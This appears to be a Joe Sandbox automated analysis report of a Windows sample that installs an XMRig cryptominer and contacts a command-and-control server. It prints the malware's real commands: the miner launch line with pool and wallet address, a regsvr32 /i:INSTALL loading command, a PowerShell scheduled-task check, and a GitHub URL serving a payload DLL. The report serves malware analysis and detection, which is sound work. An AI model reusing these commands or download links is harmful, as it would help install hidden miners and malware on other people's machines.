Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe

Overview

General Information

Sample name:SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe
Analysis ID:1611947
MD5:f3b99592f40e424a2fb51e8f60b98077
SHA1:16481ab398ad77608131d6ef9dbccce2965a970f
SHA256:aa63cf25cfc47e6a53dc1b286e425faa8775ac0311c47ca6c59d1950cfa03251
Tags:exeuser-SecuriteInfoCom
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Powershell launch regsvr32
Sigma detected: Xmrig
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Xmrig cryptocurrency miner
Connects to many ports of the same IP (likely port scanning)
Detected Stratum mining protocol
Found strings related to Crypto-Mining
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Modifies the context of a thread in another process (thread injection)
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sigma detected: Potentially Suspicious Child Process Of Regsvr32
Suspicious powershell command line found
Tries to harvest and steal Bitcoin Wallet information
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Writes to foreign memory regions
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries keyboard layouts
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Network Connection Initiated By Regsvr32.EXE
Sigma detected: Potential Regsvr32 Commandline Flag Anomaly
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe (PID: 4184 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe" MD5: F3B99592F40E424A2FB51E8F60B98077)
    • cmd.exe (PID: 6860 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\u9KSgzq29lys.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 6820 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • PING.EXE (PID: 5840 cmdline: ping -n 5 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
      • Stamp_Setup.exe (PID: 5856 cmdline: "C:\Users\user\AppData\Roaming\Stamp_Setup.exe" MD5: EDD03FA3225E40CA97884CF91EC1DF79)
        • Stamp_Setup.tmp (PID: 1060 cmdline: "C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmp" /SL5="$A0052,1101402,160256,C:\Users\user\AppData\Roaming\Stamp_Setup.exe" MD5: 639207875E87BFD011BFF971435A47DE)
          • Stamp_Setup.exe (PID: 6400 cmdline: "C:\Users\user\AppData\Roaming\Stamp_Setup.exe" /VERYSILENT MD5: EDD03FA3225E40CA97884CF91EC1DF79)
            • Stamp_Setup.tmp (PID: 7016 cmdline: "C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmp" /SL5="$C01D8,1101402,160256,C:\Users\user\AppData\Roaming\Stamp_Setup.exe" /VERYSILENT MD5: 639207875E87BFD011BFF971435A47DE)
              • regsvr32.exe (PID: 6992 cmdline: "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\9mpr_8.ocx" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
                • regsvr32.exe (PID: 1112 cmdline: /s /i:INSTALL "C:\Users\user\AppData\Roaming\\9mpr_8.ocx" MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
                  • powershell.exe (PID: 5892 cmdline: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }" MD5: 04029E121A0CFA5991749937DD22A1D9)
                    • conhost.exe (PID: 2680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • powershell.exe (PID: 6480 cmdline: "PowerShell.exe" -NoProfile -NonInteractive -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
                    • conhost.exe (PID: 1308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • powershell.exe (PID: 5708 cmdline: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }" MD5: 04029E121A0CFA5991749937DD22A1D9)
                    • conhost.exe (PID: 4792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • AddInProcess.exe (PID: 6860 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x49B3f8Aee91B59722795A67C2dc0c0c7E74a9cee.RIG_CPU -p x --cpu-max-threads-hint=50 MD5: 929EA1AF28AFEA2A3311FD4297425C94)
                  • AddInProcess.exe (PID: 6744 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x49B3f8Aee91B59722795A67C2dc0c0c7E74a9cee.RIG_CPU -p x --cpu-max-threads-hint=50 MD5: 929EA1AF28AFEA2A3311FD4297425C94)
                  • AddInProcess.exe (PID: 1060 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x49B3f8Aee91B59722795A67C2dc0c0c7E74a9cee.RIG_CPU -p x --cpu-max-threads-hint=50 MD5: 929EA1AF28AFEA2A3311FD4297425C94)
  • regsvr32.exe (PID: 4932 cmdline: C:\Windows\system32\regsvr32.EXE /s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
    • powershell.exe (PID: 3700 cmdline: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    SourceRuleDescriptionAuthorStrings
    0000000E.00000003.3117034900.000000001C21B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      Process Memory Space: regsvr32.exe PID: 1112JoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        Process Memory Space: regsvr32.exe PID: 1112JoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security

          Bitcoin Miner

          barindex
          Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x49B3f8Aee91B59722795A67C2dc0c0c7E74a9cee.RIG_CPU -p x --cpu-max-threads-hint=50, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x49B3f8Aee91B59722795A67C2dc0c0c7E74a9cee.RIG_CPU -p x --cpu-max-threads-hint=50, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe, ParentCommandLine: /s /i:INSTALL "C:\Users\user\AppData\Roaming\\9mpr_8.ocx", ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 1112, ParentProcessName: regsvr32.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x49B3f8Aee91B59722795A67C2dc0c0c7E74a9cee.RIG_CPU -p x --cpu-max-threads-hint=50, ProcessId: 6860, ProcessName: AddInProcess.exe

          System Summary

          barindex
          Source: Process startedAuthor: elhoim, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: /s /i:INSTALL "C:\Users\user\AppData\Roaming\\9mpr_8.ocx", ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 1112, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }", ProcessId: 5892, ProcessName: powershell.exe
          Source: Network ConnectionAuthor: Dmitriy Lifanov, oscd.community: Data: DestinationIp: 93.88.203.169, DestinationIsIpv6: false, DestinationPort: 39001, EventID: 3, Image: C:\Windows\System32\regsvr32.exe, Initiated: true, ProcessId: 1112, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 65255
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\9mpr_8.ocx", CommandLine: "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\9mpr_8.ocx", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmp" /SL5="$C01D8,1101402,160256,C:\Users\user\AppData\Roaming\Stamp_Setup.exe" /VERYSILENT, ParentImage: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmp, ParentProcessId: 7016, ParentProcessName: Stamp_Setup.tmp, ProcessCommandLine: "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\9mpr_8.ocx", ProcessId: 6992, ProcessName: regsvr32.exe
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: /s /i:INSTALL "C:\Users\user\AppData\Roaming\\9mpr_8.ocx", ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 1112, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }", ProcessId: 5892, ProcessName: powershell.exe

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: Process startedAuthor: Joe Security: Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: /s /i:INSTALL "C:\Users\user\AppData\Roaming\\9mpr_8.ocx", ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 1112, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }", ProcessId: 5892, ProcessName: powershell.exe
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-02-11T11:00:27.305756+010020355951Domain Observed Used for C2 Detected93.88.203.16956001192.168.2.849706TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-02-11T11:00:05.792619+010028269302Crypto Currency Mining Activity Detected192.168.2.865271161.35.34.1953333TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: C:\Users\user\AppData\Local\Temp\u9KSgzq29lys.batAvira: detection malicious, Label: BAT/Delbat.C
          Source: C:\Users\user\AppData\Roaming\Stamp_Setup.exeReversingLabs: Detection: 15%
          Source: SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeVirustotal: Detection: 58%Perma Link
          Source: SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeReversingLabs: Detection: 50%
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability

          Bitcoin Miner

          barindex
          Source: Yara matchFile source: dump.pcap, type: PCAP
          Source: Yara matchFile source: 0000000E.00000003.3117034900.000000001C21B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 1112, type: MEMORYSTR
          Source: global trafficTCP traffic: 192.168.2.8:65269 -> 161.35.34.195:3333 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"etc:0x49b3f8aee91b59722795a67c2dc0c0c7e74a9cee.rig_cpu","pass":"x","agent":"xmrig/6.21.0 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2019","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}.
          Source: global trafficTCP traffic: 192.168.2.8:65270 -> 161.35.34.195:3333 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"etc:0x49b3f8aee91b59722795a67c2dc0c0c7e74a9cee.rig_cpu","pass":"x","agent":"xmrig/6.21.0 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2019","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}.
          Source: global trafficTCP traffic: 192.168.2.8:65271 -> 161.35.34.195:3333 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"etc:0x49b3f8aee91b59722795a67c2dc0c0c7e74a9cee.rig_cpu","pass":"x","agent":"xmrig/6.21.0 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2019","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}.
          Source: regsvr32.exe, 0000000E.00000003.3117034900.000000001C21B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
          Source: regsvr32.exe, 0000000E.00000003.3117034900.000000001C21B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Skinny Orange_is1Jump to behavior
          Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.8:65257 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.8:65259 version: TLS 1.2
          Source: SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: c:\zlib-dll\Release\isunzlib.pdb source: Stamp_Setup.tmp, 0000000A.00000003.2215454921.0000000002192000.00000004.00001000.00020000.00000000.sdmp, Stamp_Setup.tmp, 0000000A.00000003.2209826181.00000000031A0000.00000004.00001000.00020000.00000000.sdmp, Stamp_Setup.tmp, 0000000C.00000003.2236329531.0000000002230000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.10.dr

          Networking

          barindex
          Source: Network trafficSuricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT/zgRAT Style SSL Cert : 93.88.203.169:56001 -> 192.168.2.8:49706
          Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 140.82.121.4 443Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 93.88.203.169 39001Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 185.199.110.133 443Jump to behavior
          Source: global trafficTCP traffic: 93.88.203.169 ports 39001,0,1,56001,5,6
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 5 localhost
          Source: global trafficTCP traffic: 192.168.2.8:49706 -> 93.88.203.169:56001
          Source: global trafficTCP traffic: 192.168.2.8:65269 -> 161.35.34.195:3333
          Source: global trafficTCP traffic: 192.168.2.8:64985 -> 1.1.1.1:53
          Source: global trafficHTTP traffic detected: GET /raz23-bot/22/raw/refs/heads/main/plugin3.dll HTTP/1.1Host: github.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raz23-bot/22/refs/heads/main/plugin3.dll HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
          Source: Joe Sandbox ViewIP Address: 140.82.121.4 140.82.121.4
          Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
          Source: Joe Sandbox ViewASN Name: DRAVANET-ASHU DRAVANET-ASHU
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: Network trafficSuricata IDS: 2826930 - Severity 2 - ETPRO COINMINER XMR CoinMiner Usage : 192.168.2.8:65271 -> 161.35.34.195:3333
          Source: unknownTCP traffic detected without corresponding DNS query: 93.88.203.169
          Source: unknownTCP traffic detected without corresponding DNS query: 93.88.203.169
          Source: unknownTCP traffic detected without corresponding DNS query: 93.88.203.169
          Source: unknownTCP traffic detected without corresponding DNS query: 93.88.203.169
          Source: unknownTCP traffic detected without corresponding DNS query: 93.88.203.169
          Source: unknownTCP traffic detected without corresponding DNS query: 93.88.203.169
          Source: unknownTCP traffic detected without corresponding DNS query: 93.88.203.169
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 93.88.203.169
          Source: unknownTCP traffic detected without corresponding DNS query: 93.88.203.169
          Source: unknownTCP traffic detected without corresponding DNS query: 93.88.203.169
          Source: unknownTCP traffic detected without corresponding DNS query: 93.88.203.169
          Source: unknownTCP traffic detected without corresponding DNS query: 93.88.203.169
          Source: unknownTCP traffic detected without corresponding DNS query: 93.88.203.169
          Source: unknownTCP traffic detected without corresponding DNS query: 93.88.203.169
          Source: unknownTCP traffic detected without corresponding DNS query: 93.88.203.169
          Source: unknownTCP traffic detected without corresponding DNS query: 93.88.203.169
          Source: unknownTCP traffic detected without corresponding DNS query: 93.88.203.169
          Source: unknownTCP traffic detected without corresponding DNS query: 93.88.203.169
          Source: unknownTCP traffic detected without corresponding DNS query: 93.88.203.169
          Source: unknownTCP traffic detected without corresponding DNS query: 93.88.203.169
          Source: unknownTCP traffic detected without corresponding DNS query: 93.88.203.169
          Source: unknownTCP traffic detected without corresponding DNS query: 93.88.203.169
          Source: unknownTCP traffic detected without corresponding DNS query: 93.88.203.169
          Source: unknownTCP traffic detected without corresponding DNS query: 93.88.203.169
          Source: unknownTCP traffic detected without corresponding DNS query: 93.88.203.169
          Source: unknownTCP traffic detected without corresponding DNS query: 93.88.203.169
          Source: unknownTCP traffic detected without corresponding DNS query: 93.88.203.169
          Source: unknownTCP traffic detected without corresponding DNS query: 93.88.203.169
          Source: unknownTCP traffic detected without corresponding DNS query: 93.88.203.169
          Source: unknownTCP traffic detected without corresponding DNS query: 93.88.203.169
          Source: unknownTCP traffic detected without corresponding DNS query: 93.88.203.169
          Source: unknownTCP traffic detected without corresponding DNS query: 93.88.203.169
          Source: unknownTCP traffic detected without corresponding DNS query: 93.88.203.169
          Source: unknownTCP traffic detected without corresponding DNS query: 93.88.203.169
          Source: unknownTCP traffic detected without corresponding DNS query: 93.88.203.169
          Source: unknownTCP traffic detected without corresponding DNS query: 93.88.203.169
          Source: unknownTCP traffic detected without corresponding DNS query: 93.88.203.169
          Source: unknownTCP traffic detected without corresponding DNS query: 93.88.203.169
          Source: unknownTCP traffic detected without corresponding DNS query: 93.88.203.169
          Source: unknownTCP traffic detected without corresponding DNS query: 93.88.203.169
          Source: unknownTCP traffic detected without corresponding DNS query: 93.88.203.169
          Source: unknownTCP traffic detected without corresponding DNS query: 93.88.203.169
          Source: unknownTCP traffic detected without corresponding DNS query: 93.88.203.169
          Source: unknownTCP traffic detected without corresponding DNS query: 93.88.203.169
          Source: unknownTCP traffic detected without corresponding DNS query: 93.88.203.169
          Source: unknownTCP traffic detected without corresponding DNS query: 93.88.203.169
          Source: global trafficHTTP traffic detected: GET /raz23-bot/22/raw/refs/heads/main/plugin3.dll HTTP/1.1Host: github.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raz23-bot/22/refs/heads/main/plugin3.dll HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
          Source: global trafficDNS traffic detected: DNS query: github.com
          Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
          Source: global trafficDNS traffic detected: DNS query: rx.unmineable.com
          Source: powershell.exe, 00000017.00000002.2556092783.00000260DF375000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoftyx
          Source: 77EC63BDA74BD0D0E0426DC8F80085060.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
          Source: SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe, 00000000.00000003.1654868087.000002DD74574000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?630f8209ac
          Source: powershell.exe, 0000000F.00000002.2340817033.000001AD47267000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2476958732.00000227EBA27000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2723313503.00000260F12A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 00000017.00000002.2563510013.00000260E1467000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 0000000F.00000002.2314170593.000001AD37427000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2386841353.00000227DBBE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3296328349.0000017280227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2563510013.00000260E1467000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
          Source: powershell.exe, 0000000F.00000002.2314170593.000001AD37201000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2386841353.00000227DB9C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3296328349.0000017280001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2563510013.00000260E1241000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 0000000F.00000002.2314170593.000001AD37427000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2386841353.00000227DBBE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3296328349.0000017280227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2563510013.00000260E1467000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
          Source: powershell.exe, 00000017.00000002.2563510013.00000260E1467000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
